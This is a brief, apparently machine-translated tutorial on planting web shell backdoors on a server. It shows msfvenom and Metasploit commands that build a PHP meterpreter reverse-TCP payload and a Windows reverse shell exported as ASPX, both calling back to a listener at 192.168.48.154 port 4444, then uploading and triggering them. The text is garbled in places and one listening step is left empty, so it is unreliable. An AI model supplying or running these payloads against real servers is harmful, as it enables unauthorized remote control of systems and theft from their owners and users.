A, PHP backdoor
There is a payload PHP meterpreter called, can successfully take advantage of this rebound in meterpreter. Proceed as follows:
1. Use msfvenom create a webshell.php
2. upload to the server
3. Start listening
4. Access webshell.php page
5. bounced Shell
payload :
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.48.154 -f raw > webshell.php
cp webshell.php /var/www/html
Start listening to get shell:
Two, aspx back door
Roughly the same as in the previous step, it is the payload little bit of difference.
Pressing step knock it,
use windows/shell_reverse_tcp info set lhost 192.168.48.154 set lport 4444 save generate -f aspx (or ASP)
Finally, copy the generated payload out uploaded to the server, you can get shelle